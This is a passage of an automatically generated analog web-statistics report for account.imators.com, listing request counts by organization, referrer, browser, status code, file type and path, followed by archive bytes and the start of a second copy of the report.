requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">81</td><td class="b"> 7.24%</td><td class="xl">205.169</td></tr> <tr><td class="R">78</td><td class="b"> 7.27%</td><td class="xl">34</td></tr> <tr><td class="R">59</td><td class="b">39.80%</td><td class="xl">20</td></tr> <tr><td class="R">40</td><td class="b"> 2.50%</td><td class="xl">3</td></tr> <tr><td class="R">34</td><td class="b"> 1.94%</td><td class="xl">167.94</td></tr> <tr><td class="R">31</td><td class="b"> 2.83%</td><td class="xl">27</td></tr> <tr><td class="R">30</td><td class="b"> 2.81%</td><td class="xl">54</td></tr> <tr><td class="R">29</td><td class="b"> 2.04%</td><td class="xl">35</td></tr> <tr><td class="R">26</td><td class="b"> 3.03%</td><td class="xl">205.210</td></tr> <tr><td class="R">26</td><td class="b"> 2.32%</td><td class="xl">44</td></tr> <tr><td class="R">19</td><td class="b"> 2.23%</td><td class="xl">198.235</td></tr> <tr><td class="R">14</td><td class="b"> 0.08%</td><td class="xl">194.87</td></tr> <tr><td class="R">14</td><td class="b"> 0.79%</td><td class="xl">199.45</td></tr> <tr><td class="R">13</td><td class="b"> 0.72%</td><td class="xl">206.168</td></tr> <tr><td class="R">12</td><td class="b"> 0.94%</td><td class="xl">185.177</td></tr> <tr><td class="R">12</td><td class="b"> 0.67%</td><td class="xl">18</td></tr> <tr><td class="R">11</td><td class="b"> 0.85%</td><td class="xl">64.227</td></tr> <tr><td class="R">10</td><td class="b"> 0.90%</td><td class="xl">123</td></tr> <tr><td class="R">10</td><td class="b"> 1.08%</td><td class="xl">179.43</td></tr> <tr><td class="R">10</td><td class="b"> 0.48%</td><td class="xl">104</td></tr> <tr><td class="R">267</td><td class="b">19.47%</td><td class="xl">[not listed: 97 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">252</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> <tr><td class="R">56</td><td class="xl"><a href="http://www.account.imators.com/">http://www.account.imators.com/</a></td></tr> <tr><td class="R">27</td><td class="xl"><a href="http://account.imators.com/">http://account.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://www.accelerategreatschools.org//wp-login.php">https://www.accelerategreatschools.org//wp-login.php</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="www.google.comhttps://t.me/optimasprimetools">www.google.comhttps://t.me/optimasprimetools</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">74</td><td class="xl">http://www.account.imators.com/</td></tr> <tr><td class="R">62</td><td class="xl">http://account.imators.com/</td></tr> <tr><td class="R">9</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.google.it/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.accelerategreatschools.org/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">68</td><td class="P">68</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">44</td><td class="P">44</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">31</td><td class="P">31</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">59</td><td class="P">19</td><td class="xl">Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)</td></tr> <tr><td class="R">17</td><td class="P">15</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 zgrab/0.x</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity</td></tr> <tr><td class="R">11</td><td class="P">11</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">9</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">35</td><td class="P">7</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36</td></tr> <tr><td class="R">18</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0</td></tr> <tr><td class="R">20</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36</td></tr> <tr><td class="R">25</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0</td></tr> <tr><td class="R">5</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4859.172 Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">curl/7.88.1</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0</td></tr> <tr><td class="R">11</td><td class="P">3</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36</td></tr> <tr><td class="R">202</td><td class="P">87</td><td class="xl">[not listed: 78 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">411</td><td class="P">237</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">390</td><td class="P">224</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">12</td><td class="P">4</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/605</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Safari/614</td></tr> <tr><td class="N">2</td><td class="R">224</td><td class="P">155</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">36</td><td class="P">35</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">6</td><td class="P">6</td><td class="xl"> Firefox/137</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/136</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">5</td><td class="xl"> Firefox/139</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/24</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/65</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/134</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/13</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/46</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/78</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/89</td></tr> <tr><td class="N">4</td><td class="R">31</td><td class="P">24</td><td class="xl">Mozilla</td></tr> <tr><td class="N">5</td><td class="R">17</td><td class="P">15</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">17</td><td class="P">15</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">6</td><td class="R">13</td><td class="P">13</td><td class="xl">Hello from Palo Alto Networks, find out more about our scans in https:</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">13</td><td class="P">13</td><td class="xl"> Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex</td></tr> <tr><td class="N">7</td><td class="R">4</td><td class="P">4</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> curl/7</td></tr> <tr><td class="N">8</td><td class="R">4</td><td class="P">4</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">9</td><td class="R">4</td><td class="P">4</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> MSIE/6</td></tr> <tr><td class="N">10</td><td class="R">22</td><td class="P">2</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">22</td><td class="P">2</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N"> </td><td class="R">15</td><td class="P">0</td><td class="xl">[not listed: 2 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">317</td><td class="P">211</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">236</td><td class="P">147</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">215</td><td class="P">136</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">21</td><td class="P">11</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">3</td><td class="R">159</td><td class="P">99</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">159</td><td class="P">99</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">69</td><td class="P">36</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">826</td><td class="xl">200 OK</td></tr> <tr><td class="R">17</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">120</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">3225</td><td class="xl">404 Document not found</td></tr> <tr><td class="R">1</td><td class="xl">500 Internal server error</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">8</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">43</td><td class="b"> 0.31%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">492</td><td class="b">25.40%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">282</td><td class="b">56.12%</td></tr> <tr><td class="x"> 10kB-100kB</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x">100kB- 1MB</td><td class="R">1</td><td class="b">18.17%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">538</td><td class="b">39.02%</td><td class="xl">[directories]</td></tr> <tr><td class="R">28</td><td class="b">37.78%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">142</td><td class="b">17.21%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">38</td><td class="b"> 4.35%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">37</td><td class="b"> 1.33%</td><td class="xl">.svg</td></tr> <tr><td class="R">43</td><td class="b"> 0.31%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">561</td><td class="b">76.50%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">217</td><td class="b">22.90%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">48</td><td class="b"> 0.61%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">533</td><td class="b">38.72%</td><td class="D">Oct/31/25 9:34 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">63</td><td class="b"> 4.83%</td><td class="D">Oct/17/25 1:01 PM</td><td class="xl"> <a href="/?165.232.149.232">/?165.232.149.232</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.87%</td><td class="D">Feb/15/25 2:11 PM</td><td class="xl"> <a href="/?54.202.183.123">/?54.202.183.123</a></td></tr> <tr class="sub level2"><td class="R">14</td><td class="b"> 1.00%</td><td class="D">Oct/24/25 7:09 PM</td><td class="xl"> <a href="/?46.101.225.202">/?46.101.225.202</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 0.96%</td><td class="D">May/31/25 8:38 PM</td><td class="xl"> <a href="/?164.90.228.79">/?164.90.228.79</a></td></tr> <tr><td class="R">72</td><td class="b"> 2.32%</td><td class="D">Oct/23/25 6:23 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">70</td><td class="b">14.89%</td><td class="D">Oct/23/25 6:23 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">38</td><td class="b"> 4.35%</td><td class="D">Oct/23/25 6:23 PM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">33</td><td class="b"> 1.20%</td><td class="D">Aug/12/25 3:11 AM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">28</td><td class="b">37.78%</td><td class="D">Aug/12/25 3:12 AM</td><td class="xl">/akcc.php</td></tr> <tr class="sub level2"><td class="R">16</td><td class="b">12.72%</td><td class="D">Aug/12/25 3:12 AM</td><td class="xl"> /akcc.php?p=</td></tr> <tr><td class="R">52</td><td class="b"> 0.74%</td><td class="D">Sep/ 4/25 10:03 PM</td><td class="xl">[not listed: 24 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK J�[$�.�� � 1.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for account.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; 